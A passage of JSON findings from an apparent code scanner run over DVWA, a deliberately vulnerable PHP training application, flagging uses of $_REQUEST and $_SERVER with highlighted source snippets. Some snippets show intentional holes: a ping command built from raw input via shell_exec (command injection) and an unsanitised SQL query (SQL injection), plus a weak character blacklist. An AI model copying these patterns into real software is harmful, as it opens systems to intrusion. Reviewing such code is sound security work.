"search": "\\s\\$_REQUEST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_current'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 178,
"file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_REQUEST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'ip'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> ",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 179,
"file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_REQUEST",
"match": "<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">8:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'ip'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Split the IP into <span class=\"token number\">4</span> octects\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$octet</span> <span class=\"token operator\">=</span> <span class=\"token function\">explode</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\".\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> ",
"line": 8,
"start": 3,
"end": 14,
"severity": "unknown",
"note": ""
},
{
"id": 184,
"file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/low.php",
"filetype": "php",
"search": "\\s\\$_REQUEST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'ip'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Determine OS <span class=\"token operator\">and</span> execute the ping command<span class=\"token punctuation\">.</span>\n<span class=\"line-number\">8:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">stristr</span><span class=\"token punctuation\">(</span> <span class=\"token function\">php_uname</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'s'</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'Windows NT'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">9:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Windows\n<span class=\"line-number\">10:</span> \t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 188,
"file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/medium.php",
"filetype": "php",
"search": "\\s\\$_REQUEST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'ip'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Set blacklist\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$substitutions</span> <span class=\"token operator\">=</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span>\n<span class=\"line-number\">9:</span> \t\t<span class=\"token string\">'&&'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token string\">''</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">10:</span> \t\t'<span class=\"token comment\" spellcheck=\"true\">;' => '',</span>",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 243,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_REQUEST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Was a number entered<span class=\"token operator\">?</span>",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 245,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/source/low.php",
"filetype": "php",
"search": "\\s\\$_REQUEST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check database\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$query</span> <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> first_name<span class=\"token punctuation\">,</span> last_name FROM users WHERE user_id <span class=\"token operator\">=</span> <span class=\"token string\">'$id'</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 246,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/source/low.php",
"filetype": "php",
"search": "\\s\\$_REQUEST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check database\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$query</span> <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> first_name<span class=\"token punctuation\">,</span> last_name FROM users WHERE user_id <span class=\"token operator\">=</span> <span class=\"token string\">'$id'</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$query</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> ",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 219,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_REQUEST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Was a number entered<span class=\"token operator\">?</span>",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 262,
"file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_REQUEST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Upload'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$uploaded_name</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$uploaded_ext</span> <span class=\"token operator\">=</span> <span class=\"token function\">substr</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token function\">strrpos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 287,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_r/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_REQUEST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is there any input<span class=\"token operator\">?</span>\n<span class=\"line-number\">4:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"name\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_GET</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token keyword\">NULL</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">5:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">6:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">htmlspecialchars</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> end user",
"line": 6,
"start": 1,
"end": 12,
"severity": "unknown",
"note": ""
},
{
"id": 301,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_REQUEST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'btnSign'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'mtxMessage'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'txtName'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> ",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 2,
"file": "/home/chris/src/DVWA-master/dvwa/includes/DBMS/MySQL.php",
"filetype": "php",
"search": "\\s\\$_SERVER",
"match": "<span class=\"line-number\">41:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"'users' table was created.\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">42:</span> \n<span class=\"line-number\">43:</span> \n<span class=\"line-number\">44:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Insert some data into users\n<span class=\"line-number\">45:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get the base directory <span class=\"token keyword\">for</span> the avatar media<span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span>\n<span class=\"highlight\"><span class=\"line-number\">46:</span> <span class=\"token variable\">$baseUrl</span> <span class=\"token operator\">=</span> <span class=\"token string\">'http://'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'SERVER_NAME'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'PHP_SELF'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">47:</span> <span class=\"token variable\">$stripPos</span> <span class=\"token operator\">=</span> <span class=\"token function\">strpos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$baseUrl</span><span class=\"token 